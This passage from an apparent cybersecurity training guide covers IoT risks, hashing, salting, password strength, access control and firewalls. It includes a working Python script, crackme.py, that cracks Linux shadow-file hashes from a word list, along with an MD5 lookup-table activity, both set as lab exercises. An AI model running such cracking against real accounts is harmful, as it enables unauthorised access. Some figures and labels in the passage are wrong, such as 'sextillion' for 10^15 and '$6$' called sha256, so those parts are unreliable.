to find. Bring Your Own Device (BYOD) is also a factor, as confidential workplace data may be stored
in an unencrypted state on a private phone. As smartphone usage continues to increase, as BYOD
becomes more popular, and as two-factor authentication becomes more common, we can expect
that smartphone related cyber-crime will also increase.

Artificial intelligence
Imagine a program that, once set in motion, automatically scans website after website, creating
fraudulent mirror sites and scraping email addresses, then forging email phishing attacks and
acting on the responses, with no human intervention. This is an example of Artificial Intelligence (AI).

One of the factors making cyber-crime appealing is its anonymity. It appears to be human nature
that if a person thinks they are unlikely to be caught, they are more likely to commit an offence. AI is
making individuals even more anonymous than previously allowing fully automated attacks. So, as AI
technology improves and individuals distance themselves from the majority of the crime, we can
expect cybercrime in general to increase.

3.6 Cyber-attacks on enterprise infrastructure are identified

Cyber-attacks on enterprise infrastructure


With the population explosion of Internet of Things, as well as Industrial Internet of Things devices,
and Industry 4.0, the attack surface of an enterprise's infrastructure increases. Traditional
cyberattacks centre on workstations, servers, routers, switches and printers, but IoT gives access to a
different set of attackable devices such as lighting, electrical systems, traffic control systems, Heating
Ventilation and Air Conditioning (HVAC), SCADA systems & Programmable Logic Controllers (PLC).

These attackable devices can be described as ‘Operational Technology’; they are hardware &
software that monitor and control how physical devices operate. A significant difference seen
when comparing operational technology with traditional IT devices is the threat to life that comes with
malicious control of operational technology.

Examples of enterprise infrastructure attacks
Stuxnet is a 2010 malicious worm that targets Supervisory Control and Data Acquisition (SCADA)
systems. SCADA systems monitor and control devices such as valves, pumps, and motors in industrial
processes. Stuxnet reportedly compromised PLCs at an Iranian nuclear site, causing fast-spinning
centrifuges to tear themselves apart.

Activity – Visit CSO Online and review the Stuxnet attack.

https://www.csoonline.com/article/3218104/what-is-stuxnet-who-created-it-and-how-
does-it-work.html

In 2015 and 2017 malware titled ‘Black Energy 3’ took remote control of SCADA systems, resulting in
electricity generation plants being shut down. This resulted in hundreds of thousands of people
going without electricity and, subsequently, heating.

Activity – Visit BBC and review the 2015 Ukrainian power station attack.

https://www.bbc.com/news/technology-35667989

3.7 Examples of IOT devices are described and demonstrated

Internet of Things devices


An Internet of Things device is a sensor or actuator that carries out its operation through the
Internet. Being a recent development, IoT devices are not the devices that you would generally consider as
being connected to the Internet, such as a workstation, printer or perhaps even a smartphone. IoT
devices are seen in most if not all employment and other sectors including consumer, industrial,
education, manufacturing, transportation, healthcare, energy, and law enforcement.

IoT device examples


Examples of IoT devices include a light that can be turned on via a phone app; a camera that
provides video to a remote destination over the Internet; a remote gate opener controlled by a
smartphone; a remote controlled thermostat, provided that control occurs over the Internet; motor
control in a factory; and the sensors and/or actuators in a car, plane, or anywhere else, if those
sensors and/or actuators feed back through or are controlled over the Internet. IoT devices are often
referred to as smart devices, and so smart refrigerators, smart watches, smart door locks, smart cars
and smart security systems can all be referred to as IoT devices.

Activity – Visit Software Testing Help and review current IoT devices.

https://www.softwaretestinghelp.com/iot-devices/

Activity – Use Packet Tracer IoT to demonstrate IoT devices

Packet Tracer includes premade examples of functional IoT networks (File > Open)

3.8 Security vulnerabilities for IOT devices are defined

IoT security vulnerabilities


IoT devices are often not designed with security in mind and so there are many vulnerabilities. In
2018 OWASP released a top 10 list of IoT vulnerabilities, as follows.

1. Weak, guessable, default or hardcoded passwords
Weak and guessable passwords are easily brute forced. Default passwords are publicly
available and are often not changed. Hardcoded passwords are also publicly available and
cannot be changed.
2. Insecure network services
Services such as DHCP are implemented on some IoT devices. These can be leveraged by an
attacker.
3. Insecure ecosystem interfaces
An ecosystem interface refers to the interface between the IoT device and other entities
such as a network or direct attachment to another device. Issues here include no encryption
and no authentication. That is to say that credentials may be sent in clear text and access
can be granted without credentials.
4. Lack of secure update mechanism
The device cannot be securely updated. For example, perhaps the device can be updated
without authentication, or the update in transit is not encrypted, or it is not possible to
determine the current version of firmware on the device.
5. Use of insecure or outdated components
This includes software and/or libraries and/or hardware that are known to be insecure,
including customisation of the operating system on which the device runs.
6. Insufficient privacy protection
Personal information is stored insecurely on the device or passes in transit
through an insecure ecosystem as described in 3.
7. Insecure data transfer and storage
No encryption and/or access control anywhere within the ecosystem, including on the device.
8. Lack of device management
Devices are deployed, updated or decommissioned without security in mind.
9. Insecure default settings
Default settings from the manufacturer are either not changed or cannot be changed. These
default settings are available for lookup on the Internet.
10. Lack of physical hardening
Devices are physically accessible to attackers.
https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project (accessed 29 May 2020)

4.1 Techniques to protect personal devices and data are described and implemented
4.3 Methods to protect personal devices from threats are implemented

Protecting personal devices and data


The general method used to protect personal devices from threats is to implement multiple
techniques as follows.

Encryption
Encryption is the encoding of data so as to make it unreadable. Commonly used encryption
algorithms include AES, RSA, 3DES and Twofish.

AES (Advanced Encryption Standard)


AES is a symmetric encryption algorithm, meaning that the same key is used for encryption
and decryption. Various AES key lengths are possible, including AES-128, AES-192 and AES-256.
More bits equates to a longer and more difficult to crack key. An issue with symmetric
algorithms is that there needs to be a secure method of sharing the key.

RSA (Rivest, Shamir & Adleman)


RSA is an asymmetric encryption algorithm, meaning that different keys are used for
encryption and decryption. RSA keys are 1024 or 2048 bits. Due to technology advancement
it is estimated that by the year 2030, RSA key lengths of 3072 bits will be required for
security.

However, the longer the key length, the longer it takes to carry out encryption and
decryption. So, although the key does not have to be shared in secret as it does with a
symmetric algorithm, using RSA encryption on an ongoing basis, such as when communicating
between a web browser and web server, causes too much of a performance detriment to be usable.
Therefore, for these types of transactions the initial communication involves encryption of a
symmetric key using RSA. Once the key transfer has occurred, the remaining communication is
carried out using symmetric encryption.

Hashing
On Windows systems passwords are not stored on the machine. Rather, a hash of the password is
stored. Then when a user enters their password, the password is hashed and compared to the
stored hash of the password. If the hashes match then the correct password must have been
entered. Notice that a given hashing algorithm, such as MD5, will always produce the same hash
from a given password.

Activity – Visit the following link and notice that even a slight change in password will
produce a totally different hash

https://emn178.github.io/online-tools/sha256.html

Password cracking software uses the same principle that a given word will always produce the same
hash. The software generates a password and then generates a hash of the password. It compares
the hash to the hash on the local machine. If the hashes match, then the password has been
guessed. This method is called brute force. Unless you have some idea of what the password is, then
brute force is the only guaranteed method of cracking the password. Unless the password is short or
simple, brute force would take many years to crack a password.

Trusted Platform Module (TPM)


A TPM chip is included on the motherboard of most modern PCs. The chip can be configured via
software to generate RSA encryption keys and part of one of the keys is stored in the chip. This
means that the key is not stored entirely on the disk drive which means that the drive cannot be
removed, and access attempts made on it. Key creation happens behind the scenes and so when
encrypting a drive with MS BitLocker for example, Windows will generate the keys, store part of one
in the chip and use your password in conjunction with the key to access your data. You need your
password and the same computer that the encrypted drive was created in, to access the data.

Passwords
Passwords that are difficult to guess and crack are vital for system security. A password of at least 8
characters using a mix of capital, lower case, numbers, and special characters is recommended. The
possibility of a password being cracked is directly related to the length and mix of characters from
the available character set. Assuming a three-character set (1, 2, 3) and a password length of two
characters, then there are nine possible combinations: 1,1; 1,2; 1,3; 2,1; 2,2; 2,3; 3,1; 3,2; 3,3.

The formula for the number of possible combinations given a known character set and password
length is: character set size to the power of the password length. In this example: 3^2 = 9 possible
combinations. In fact, there would be more combinations than this because the length can be one,
two or three characters. So total = 3^1 + 3^2 + 3^3 = 3 + 9 + 27 = 39 combinations.

On a common keyboard the character set is 95 characters (a-z; A-Z; 0-9; special characters). So, assuming an
eight-character password length, the number of possible combinations is:

95^8 + 95^7 + 95^6 + 95^5 + 95^4 + 95^3 + 95^2 + 95^1 = 6.704780955 × 10^15 (6,704,780,955,000,000)

Or 6.7 sextillion combinations.

To brute force check that many combinations via a regular login page is not possible. Assuming a
hash of the password was available to work on, an average PC might be able to check 100 million
passwords per second. Which for 6.7 sextillion combinations, works out to be about 775 days. Add
an extra character on to the eight-character password, and this jumps to 630 sextillion combinations
which equates to about 72945 days to crack, assuming the hash was available.

Note that there are faster methods of brute forcing, such as using the graphics processor in a PC.
Using more advanced methods it is possible to check about 350 billion hashes of passwords a
second. This could brute force all 95^8 combinations of an eight-character password in about 5 hours.
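The keyspace and time-to-crack arithmetic above, carried through in Python as an added example (not code from the guide). It generalises the guide's sum to any character set size and length and, going one step further than the text, adds minimum_length, which finds the shortest password length whose keyspace takes at least a chosen time to exhaust at a chosen guess rate; the 100 million and 350 billion guesses-per-second rates are the figures quoted above.

```python
"""Password keyspace and brute-force time estimates (added example, not from the guide)."""

SECONDS_PER_DAY = 24 * 60 * 60


def keyspace_exact(charset_size: int, length: int) -> int:
    """Number of passwords of exactly `length` characters: charset_size ** length."""
    return charset_size ** length


def keyspace_up_to(charset_size: int, max_length: int) -> int:
    """Number of passwords of 1..max_length characters, i.e. the guide's sum
    charset_size^1 + charset_size^2 + ... + charset_size^max_length.
    Python integers are unbounded, so the result is exact rather than a float estimate."""
    return sum(charset_size ** n for n in range(1, max_length + 1))


def seconds_to_exhaust(combinations: int, guesses_per_second: float) -> float:
    """Worst-case time to try every combination at a steady guess rate."""
    return combinations / guesses_per_second


def days_to_exhaust(combinations: int, guesses_per_second: float) -> float:
    return seconds_to_exhaust(combinations, guesses_per_second) / SECONDS_PER_DAY


def hours_to_exhaust(combinations: int, guesses_per_second: float) -> float:
    return seconds_to_exhaust(combinations, guesses_per_second) / 3600


def minimum_length(charset_size: int, guesses_per_second: float, min_seconds: float) -> int:
    """Shortest password length whose full keyspace (at exactly that length) takes at
    least `min_seconds` to exhaust at `guesses_per_second`.  This goes beyond the
    guide's worked numbers: it answers "how long must a password be?" for a chosen
    attacker speed and a chosen survival time."""
    length = 1
    while seconds_to_exhaust(keyspace_exact(charset_size, length), guesses_per_second) < min_seconds:
        length += 1
    return length


if __name__ == "__main__":
    # the guide's small illustration: three symbols, one to three characters long
    print("3 symbols, 1-3 chars:", keyspace_up_to(3, 3))          # 39

    # a 95-symbol keyboard character set, one to eight characters long
    eight = keyspace_up_to(95, 8)
    print(f"95 symbols, 1-8 chars: {eight:,} ({eight:.9e})")

    cpu_rate = 100_000_000        # 100 million hashes/second, the guide's "average PC"
    gpu_rate = 350_000_000_000    # 350 billion hashes/second, the guide's GPU figure
    print(f"CPU, 1-8 chars: {days_to_exhaust(eight, cpu_rate):.0f} days")
    print(f"CPU, 9 chars:   {days_to_exhaust(keyspace_exact(95, 9), cpu_rate):.0f} days")
    print(f"GPU, 8 chars:   {hours_to_exhaust(keyspace_exact(95, 8), gpu_rate):.1f} hours")

    ten_years = 10 * 365 * SECONDS_PER_DAY
    print("Length needed to survive 10 years of GPU guessing:",
          minimum_length(95, gpu_rate, ten_years))                # 11
```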

Pass phrase
Pass phrases such as “if0nlyThereweret!me” are more secure than passwords due to their length.
Also, because they are easier for a user to remember than a complex password such as #5FGE@7!,
the pass phrase does not need to be written down.

Salt
A salt is random clear text data that is added to a password before it is hashed, to create a more
secure hash. When a user first creates an electronic account, a random string known as the salt is
added to the password. The password and salt combination are then hashed and stored. The clear
text salt is also stored with the hash. When a user logs in again, the entered password is paired with
the salt, then hashed, and then compared against the stored hash. If the hashes match, then the
correct password must have been used, and entry is granted.

Note that salting does not protect against guessing a user’s password or protect against brute force
password attacks, because the clear text salt that matches the username is always provided. Salting
protects against premade lookup table attacks, where a database of hashes can be looked up to see
what their matching passwords are. For example, a hash can be entered in various online sites that
contain lookup tables like the one below.

Password    MD5 hash
12345678    25d55ad283aa400af464c76d713c07ad
letmein     0d107d09f5bbe40cade3de5c71e9e9b7

Pasting in the hash will retrieve the associated password.

Activity – Try it and see:

 Enter a simple password at the following site and generate a hash
http://www.miraclesalad.com/webtools/md5.php
 Now copy that hash into the relevant field at the link below and note that the
password is likely discovered
https://crackstation.net/

The site contains a lookup table with billions of entries and so simple passwords are
easily broken.

Now back to salting. If a salt such as !46&8f is added to a simple password such as ‘letmein’, the
password becomes !46&8fletmein. The hash of this password is very unlikely to exist in a lookup
table.
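The lookup-table weakness and the salted store-and-verify cycle described above, as an added example in Python (not the guide's code). The lookup table is a constructed stand-in holding four common passwords, and the record format pbkdf2_sha256$rounds$salt$hash is my own, chosen to mirror the way the clear-text salt is kept next to the hash.

```python
"""Lookup-table attacks on unsalted hashes versus salted storage (added example)."""
import hashlib
import hmac
import secrets

# Constructed stand-in for an online hash lookup table: a few common passwords and
# their bare MD5 digests, keyed by digest.  Real sites hold billions of rows built
# exactly this way, which is why an unsalted hash of a common password is reversible.
COMMON_PASSWORDS = ["12345678", "letmein", "password", "qwerty"]
LOOKUP_TABLE = {hashlib.md5(p.encode()).hexdigest(): p for p in COMMON_PASSWORDS}

SCHEME = "pbkdf2_sha256"      # record scheme label chosen for this example
DEFAULT_ROUNDS = 100_000


def reverse_unsalted_md5(hex_digest: str):
    """Recover the password behind a bare MD5 hash by table lookup (None if absent).
    This works only because an unsalted hash of a given password never changes."""
    return LOOKUP_TABLE.get(hex_digest.lower())


def salted_md5_hex(salt: str, password: str) -> str:
    """The guide's illustration: prepend a clear-text salt before hashing.  MD5 is used
    here only to mirror the guide's table; the storage functions below use PBKDF2."""
    return hashlib.md5((salt + password).encode()).hexdigest()


def hash_with_salt(password: str, salt: bytes, rounds: int) -> bytes:
    """Combine password and salt and run them through a slow, iterated hash."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)


def create_record(password: str, rounds: int = DEFAULT_ROUNDS) -> str:
    """Account creation: draw a fresh random salt, hash password+salt, and keep the
    clear-text salt beside the hash (the same idea as $id$salt$hash in /etc/shadow)."""
    salt = secrets.token_bytes(16)
    digest = hash_with_salt(password, salt, rounds)
    return f"{SCHEME}${rounds}${salt.hex()}${digest.hex()}"


def stored_hash(record: str) -> str:
    """Just the hash portion of a record."""
    return record.split("$")[3]


def verify(password: str, record: str) -> bool:
    """Login: hash the entered password with the stored salt and compare."""
    scheme, rounds, salt_hex, digest_hex = record.split("$")
    if scheme != SCHEME:
        raise ValueError(f"unsupported scheme {scheme!r}")
    candidate = hash_with_salt(password, bytes.fromhex(salt_hex), int(rounds))
    # constant-time comparison so response timing does not leak matching bytes
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


if __name__ == "__main__":
    # 1. Unsalted: the guide's two table entries come straight back out.
    for digest in ("25d55ad283aa400af464c76d713c07ad", "0d107d09f5bbe40cade3de5c71e9e9b7"):
        print(digest, "->", reverse_unsalted_md5(digest))

    # 2. The guide's salt makes the same cheap hash useless to the table.
    salted = salted_md5_hex("!46&8f", "letmein")
    print("md5('!46&8f' + 'letmein') in table?", salted in LOOKUP_TABLE)     # False

    # 3. Properly stored: two users who both pick 'letmein' get different records,
    #    and only the right password verifies.
    alice = create_record("letmein")
    bob = create_record("letmein")
    print("alice and bob share a hash?", stored_hash(alice) == stored_hash(bob))  # False
    print("alice / letmein:", verify("letmein", alice))     # True
    print("alice / letmeout:", verify("letmeout", alice))   # False
```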

Python Script for Password Cracking


crackme.py is a password cracker for Linux shadow files. More specifically, it is a hash comparator
for crypt(3) hashes, which are a Data Encryption Standard hash used within the shadow file of Linux
distributions. The script can be executed via the Python interpreter as follows:

 python3 crackme.py <password list> <shadow file>

e.g. python3 crackme.py list.txt /etc/shadow

 The password list and shadow file should exist in the same directory as crackme.py, or the full
path to the files must be provided. e.g. python3 crackme.py /usr/share/wordlists/list.txt
/etc/shadow

 There is no screen output while the script is running. After checking all passwords against all
hashes, the script ends and displays any found passwords along with the relevant username.
If no hash matches are found, the script ends without displaying anything.

1. The password cracker script is to be run on a shadow file (/etc/shadow) using a supplied list
of passwords.

2. Create your own password list that contains at least one password for a user on your Linux
system, and run the script as follows.

3. python3 crackme.py passwords.txt /etc/shadow

4. The hash should be matched, and the password found.

Activity – Crack a password by comparing hashes from a Linux shadow file with those
generated from a word list.

The following is an entry found in a Linux shadow file (/etc/shadow)

user2:$6$T05Pet/R$Ku0yz7Zs.KZArztetOhb5hPAs0Hk4XHF6hbiskh9.PyZ9w2bHLGJOLDvkcXe6Y3LlgjUwvAD0zojZOY/t2crI

There are four sections to the entry.

1. Username – user2
2. Hash type – 6 (sha256 crypt(3))
3. Salt – T05Pet/R
4. Hashed password – Ku0yz7Zs.KZArztetOhb5hPAs0Hk4XHF6hbiskh9.PyZ9w2bHLGJOLDvkcXe6Y3LlgjUwvAD0zojZOY/t2crI

Use the following script to crack a password in the shadow file

Copy the following script into a text file in Linux and save it as crackme.py. Note that Python 3
must be installed (apt install python3).

# imported modules for methods used by script
import crypt   # note: the crypt module is deprecated from Python 3.11 and removed in Python 3.13
import sys

# If sufficient command-line arguments have not been used then print error message and exit program.
# Otherwise proceed to open the files given as command-line arguments
if len(sys.argv) < 3:
    print("program requires two command-line arguments. 1. Password list 2. Shadow file")
    sys.exit(1)

# open the file given as command-line argument-one as read-only, and assign a handle called 'passwordFile'
passwordFile = open(sys.argv[1], "r")

# for every line in the open file repeat the following
for password in passwordFile:

    # open the file given as command-line argument-two as read-only, and assign a handle called 'shadowFile'
    # (reopened for every candidate password so that it is read from the start each time)
    shadowFile = open(sys.argv[2], "r")

    # for every line in the open file repeat the following
    for line in shadowFile:

        # split the line into sections delimited by ':', retrieve the second entry (hash, salt and $6$ descriptor)
        # on that line and assign its value to 'retrievedHash'
        retrievedHash = line.split(":")[1]

        # split the line into sections delimited by ':', retrieve the first entry (username) on that line
        # and assign its value to 'retrievedName'
        retrievedName = line.split(":")[0]

        # accounts with no usable hash (locked or passwordless accounts show '*' or '!' here) are skipped
        if not retrievedHash.startswith("$"):
            continue

        # strip the newline descriptor from the password and pass it through to crypt() along with the
        # full encrypted password including the salt and the $digit$ method. crypt() will return the hash of the password
        hash = crypt.crypt(password.rstrip(), retrievedHash)

        # if the returned hash is the same as the hash retrieved from the shadow file,
        # then the password passed through to crypt() must have been the user's password
        # and so print the user's password with the newline descriptor removed
        if hash == retrievedHash:
            print("Found password for " + retrievedName + " as " + password.rstrip())

    # close the shadow file before moving on to the next candidate password
    shadowFile.close()

# close the password list
passwordFile.close()

Multi-factor authentication
Multi-factor authentication uses a combination of factors before access is granted to a device. For
example, a two-factor authentication method may use a password and a swipe card. The possible
factors include

 Something you know – password
 Something you have – swipe card, or a PIN code sent by SMS to a phone
 Something you are – biometric scanning such as fingerprint or gait

Two-factor authentication (2FA) is common today.

Backup
The backup of data can help restore data after a loss or a ransomware attack. Personal backup media
usually includes an external drive or the cloud. Backups should occur daily and test restoration
should occur after each backup. This will ensure data can be accessed again should data be lost,
deleted, or maliciously encrypted.

Anti-malware and Anti-virus


Anti-malware and anti-virus tools are different, though their functionality overlaps,
which confuses the issue. Anti-virus is designed to target viruses, worms, and Trojans, generally in
real-time, but can also find them after they have infected a device. Anti-malware, on the other hand, is
designed to locate infections rather than provide protection in real-time, and targets adware,
spyware, and malware. Often anti-malware is a tool designed to find and remove a single type of
threat, such as a rootkit, that a general anti-virus product cannot remove. Anti-virus is designed to
prevent a multitude of infections. However, some anti-malware is also able to find a multitude of
infections.

 Anti-virus products include AVG, Windows Defender and Symantec
 Anti-malware includes Malwarebytes, TDSSKiller, Spybot Search and Destroy and Symantec
threat-specific tools.

It is not uncommon for someone who deals with malware and viruses to use multiple general
antimalware tools on a regular basis, as well as download specific removal tools as required.

Activity

 Visit Kaspersky and review the TDSSKiller rootkit removal tool
https://usa.kaspersky.com/downloads/tdsskiller
 Review threat-specific removal tools
https://www.majorgeeks.com/mg/sortname/symantec_removal_tools.html

Operating system and application updates


Lack of operating system and application updates is one of the largest causes of successful cyber-
attacks. They are both listed by the Australian Signals Directorate as essential items for mitigation of
cyber-attacks. Assuming a vulnerability is known to a vendor there is usually a patch available for it.

Depending on the application or operating system in use, updates may be automatic or manual.

Configure browser to block Flash, ads and java
For many years web pages used only HTML and showed only still images and text.
Adobe Shockwave Flash Player changed this and enabled playing of movies, games, and
advertisements within a web browser. It became very popular and was installed on many millions of
devices. However, its widespread use meant that it became a target for hackers, and they found
many vulnerabilities. Currently there are over 1000 vulnerabilities listed for Flash. Because of this it
is recommended to keep Flash updated and/or block Flash in a web browser, either permanently or
on an ‘as needed’ basis.

Activity

Visit CVE and review Flash vulnerabilities.

https://www.cvedetails.com/vulnerability-list/vendor_id-53/product_id-6761/Adobe-Flash-Player.html

Java is like Flash in its application and vulnerabilities. Most browsers today no longer support Java.

Activity

 Visit Make Use Of and review the top ten list of no longer supported applications
https://www.makeuseof.com/tag/java-security-risk/
 Visit CVE and review Java vulnerabilities
https://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id-19117/Oracle-JRE.html

It is also recommended to block web browser ads. Ads are not just annoying; they are also a source
of malware (malvertising). By clicking malvertising, or even just visiting a site that carries it, you
can start the process of infection.

However, blocking ads may affect your viewing experience. Because ads are a source of revenue, some
sites may refuse to provide their content if an ad blocker is used. In that instance you could enable a
browser’s phishing and malware protection features instead.

Activity

Although not part of our unit, in your own time you may want to:

 Encrypt a hard drive using BitLocker (note that VirtualBox does not support this)
 Set strong passwords and passphrases
 Use a backup program such as Paragon community edition

4.2 Authentication techniques are identified and demonstrated

Authentication Techniques
Authentication on a computer or network is the method used to identify a user, object or service.
Often authentication occurs via a user supplying login credentials such as a username and password.
However, other authentication methods include biometric devices such as fingerprint, iris and facial
recognition scanners, digital certificates, and smart cards.

Objects such as printers, and services that provide data and operations to network clients such as a
web service or file service, also require authentication. This is an automated process that happens in
the background using authentication tokens preassigned by the operating system.

On a local machine the ‘Local Security Authority’ (LSA) is a system process that authenticates and
logs users on to a local computer. The LSA communicates with the ‘Security Accounts Manager’
(SAM) database that stores local user accounts and groups.

On a domain machine the LSA communicates with the Active Directory database that stores
accounts for a network domain.

AAA
Authentication is often spoken about in conjunction with Authorisation and Accounting (AAA). In a
computing environment authorisation is the process of allowing or denying access to system
resources. File and folder NTFS permissions, such as read and write permissions, are an example of
authorisation. Once a user, object or service is authenticated they are automatically authorised to
access resources based on the set permissions.

In a computing environment, accounting refers to keeping track of the activities of a user, service or
object and their resource consumption. Examples include amount of data sent during a session,
success or failure of login attempts, and time of printing.

Active Directory Users and Computers


Active Directory Users and Computers is the user interface within Active Directory where user
accounts, and hence authentication, can be managed. A user account contains a username,
password, and group membership. Active Directory Users and Computers is installed automatically
when the Active Directory Domain Services role is installed.

Activity – AAA

Add users and groups in Active Directory. Setup file and folder permissions for
individuals and groups. Monitor failed login attempts via auditing.

A note about domain user accounts and domain computers. Active Directory contains domain user
accounts and domain computer accounts. A computer account is added automatically when a
computer joins a domain. A user account is added manually and includes a username, password, and
group membership. There can be multiple user accounts allocated to a single computer account.

4.5 Logical and physical access controls are defined and implemented

Logical and physical methods of gaining access to computing elements


Physical access control includes keys, ID cards, smart cards and biometric devices that enable access
to an area, room, or building.

Logical access controls apply to authentication, authorisation and accounting. They include passwords
and biometric devices that provide access to networks and other resources, as well as permissions to
access files, folders, printers, and other devices.

Biometric devices
Biometric devices are an example of a logical and a physical access device. For example, a fingerprint
scanner can provide access to the logical elements of a PC or give access to open a door into a room.
Biometric devices include iris scanners as well as facial, gait, voice, and keystroke recognition.

Permissions
Permissions are applied to computing resources such as files, folders and printers to determine who
has access and what type of access they have. For example, user1 may have access to read, write
and modify a specific file, whilst user2 may have no access to that file, or perhaps read-only access.
Permissions can be assigned to individuals or to groups that contain individuals.

Permission – Description

Full control – View file or folder contents, change existing files and folders, create new files and
folders, and run programs in a folder.
Modify – Change existing files and folders but cannot create new ones.
Read and execute – View the contents of existing files and folders and run programs in a folder.
Read – View the contents of a folder as well as open files and folders.
Write – Create new files and folders and make changes to existing files and folders.

Figure 3 – Windows NTFS permissions

Activity – File permissions

Apply and test NTFS permissions and Linux Permissions
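The way the table’s permission levels combine for a user who is in several groups is easiest to see in code. The following is an added worked example in Python, not Windows or Active Directory code: the users, groups and access control entries are constructed, the permission levels are mapped to sets of basic rights following the table’s descriptions (viewing is assumed to be part of Modify, since changing a file implies reading it), and the model is simplified to the two rules that matter here: a user’s effective rights are the union of the rights allowed to them and to their groups, and an explicit Deny overrides an Allow.

```python
"""Effective permissions in the style of the NTFS table above.

Added example (not Windows or Active Directory code): the users, groups and
access control entries are constructed, and the model is simplified (no
inheritance or ownership rules). Two rules it does model: a user's effective
rights are the union of what is allowed to them and to every group they are
in, and an explicit Deny overrides an Allow.
"""
from dataclasses import dataclass

# Permission levels from the table, expressed as sets of basic rights.
# Assumption: "Modify" is taken to include viewing, since changing a file
# implies reading it; the table itself only says "change existing files".
LEVELS = {
    "Full control": {"view", "change", "create", "execute"},
    "Modify": {"view", "change"},
    "Read and execute": {"view", "execute"},
    "Read": {"view"},
    "Write": {"create", "change"},
}


@dataclass(frozen=True)
class Ace:
    """One access control entry: who, allow or deny, and which level."""
    principal: str  # a user name or a group name
    kind: str       # "allow" or "deny"
    level: str      # a key of LEVELS


# Constructed group membership (in Windows this would come from the SAM or
# Active Directory).
GROUPS = {
    "user1": {"Finance", "Everyone"},
    "user2": {"Everyone"},
    "user3": {"Finance", "Everyone"},
}

# Constructed ACL for a single file: the Finance group may modify it,
# everyone may read it, and user3 is explicitly denied Write.
REPORT_ACL = [
    Ace("Finance", "allow", "Modify"),
    Ace("Everyone", "allow", "Read"),
    Ace("user3", "deny", "Write"),
]


def principals_for(user: str) -> set:
    """The user plus every group the user belongs to."""
    return {user} | GROUPS.get(user, set())


def effective_rights(user: str, acl: list) -> set:
    """Union of allowed rights minus union of denied rights."""
    mine = principals_for(user)
    allowed, denied = set(), set()
    for ace in acl:
        if ace.principal not in mine:
            continue
        target = allowed if ace.kind == "allow" else denied
        target.update(LEVELS[ace.level])
    return allowed - denied


def can(user: str, action: str, acl: list) -> bool:
    """True if the action is in the user's effective rights."""
    return action in effective_rights(user, acl)


if __name__ == "__main__":
    for user in ("user1", "user2", "user3", "user4"):
        print(f"{user}: {sorted(effective_rights(user, REPORT_ACL))}")
```

Run as written, user1 ends up with view and change through the Finance group, user2 with view only through Everyone, user3 with view only because the explicit Deny on Write strips the change right the group granted, and a user in no group gets nothing. When testing real NTFS permissions in the activity, the Effective Access tab shows the same kind of result.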

5.1 Common equipment used to protect an organisation from cyber security attacks is identified

Equipment used to protect an organisation from cyber security attacks


Hardware used to protect from cyber-attacks includes firewalls, intrusion detection/prevention
systems, Unified Threat Management systems, routers, and switches.

Firewall
The purpose of a firewall is to filter inbound and outbound network traffic. A firewall matches packet
headers against permit and deny rules based on source/destination ports and IP addresses. A firewall is
an in-band device, meaning that network traffic must pass through it. A firewall is often the first
device encountered at the perimeter of a network. A firewall may be dedicated to the function of
firewalling or included along with other functionality in a PC, router, switch, modem or Wireless
Access Point (WAP).

Packet filtering
A packet filtering firewall performs deny/allow packet filtering on static values such as IP addresses
and port numbers but has no regard to a packet’s connection state. A packet filtering firewall may
also be described as a stateless firewall.

Stateful
A stateful firewall keeps track of incoming and outgoing traffic so as to allow only traffic that belongs
to an existing connection. Whilst this is a more secure process, tracking traffic uses more resources,
resulting in slower processing, and exposes the firewall to a specific weakness: its connection-tracking
resources can become depleted, causing it to stop functioning. Stateful firewalls are also more
expensive than stateless firewalls.
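The difference between the two designs is clearest when the same packets are run through both. The following is an added example in Python, not the page’s or any vendor’s firewall code; the rules, addresses, ports and the packet trace are all constructed. The stateless policy needs a rule admitting any packet from source port 443 so that web replies can get back in, and that rule also admits an unsolicited inbound packet that merely carries source port 443; the stateful firewall admits an inbound packet only if an inside host opened the connection it claims to belong to. A bounded state table models the resource depletion described above.

```python
"""Stateless (packet-filtering) versus stateful firewall, as a simulation.

Constructed example: the rules, addresses, ports and packet trace below are
made up for illustration; they are not taken from any real firewall.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    flags: str  # TCP flags as letters: "S" = SYN, "SA" = SYN/ACK, "A" = ACK


@dataclass(frozen=True)
class Rule:
    """A stateless rule: a fixed match on header fields ("*" = wildcard)."""
    action: str       # "permit" or "deny"
    src_ip: str
    src_port: object  # int or "*"
    dst_ip: str
    dst_port: object  # int or "*"

    def matches(self, p: Packet) -> bool:
        def ok(pattern, value):
            return pattern == "*" or pattern == value
        return (ok(self.src_ip, p.src_ip) and ok(self.src_port, p.src_port)
                and ok(self.dst_ip, p.dst_ip) and ok(self.dst_port, p.dst_port))


INTERNAL_PREFIX = "10.0.0."  # constructed internal network

# Typical stateless policy for a site that only browses HTTPS. The second
# rule exists only so that replies can get back in, and it is the weak spot:
# it judges the packet by its header alone.
STATELESS_RULES = [
    Rule("permit", "*", "*", "*", 443),   # outbound HTTPS
    Rule("permit", "*", 443, "*", "*"),   # anything claiming to come from port 443
]


def stateless_filter(rules, p: Packet) -> str:
    """First matching rule wins; default deny when nothing matches."""
    for rule in rules:
        if rule.matches(p):
            return rule.action
    return "deny"


class StatefulFirewall:
    """Admits inbound packets only if they reply to a connection an internal
    host opened. The bounded state table models the resource limit the text
    describes: once it is full, new connections are refused."""

    def __init__(self, max_entries: int = 1000):
        self.state = set()
        self.max_entries = max_entries

    def filter(self, p: Packet) -> str:
        outbound = (p.src_ip, p.src_port, p.dst_ip, p.dst_port)
        reply_to = (p.dst_ip, p.dst_port, p.src_ip, p.src_port)
        if p.src_ip.startswith(INTERNAL_PREFIX):
            if p.flags == "S":  # new connection request from inside
                if len(self.state) >= self.max_entries:
                    return "deny"  # state table exhausted
                self.state.add(outbound)
            return "permit" if outbound in self.state else "deny"
        # From outside: only a reply to a tracked outbound connection passes
        return "permit" if reply_to in self.state else "deny"


# Constructed trace: a legitimate HTTPS exchange, then an unsolicited inbound
# SYN to port 22 whose source port happens to be 443.
TRACE = [
    Packet("10.0.0.5", 40000, "203.0.113.10", 443, "S"),
    Packet("203.0.113.10", 443, "10.0.0.5", 40000, "SA"),
    Packet("10.0.0.5", 40000, "203.0.113.10", 443, "A"),
    Packet("198.51.100.7", 443, "10.0.0.5", 22, "S"),
]


def compare(trace=TRACE) -> list:
    """Return (stateless_decision, stateful_decision) for each packet."""
    fw = StatefulFirewall()
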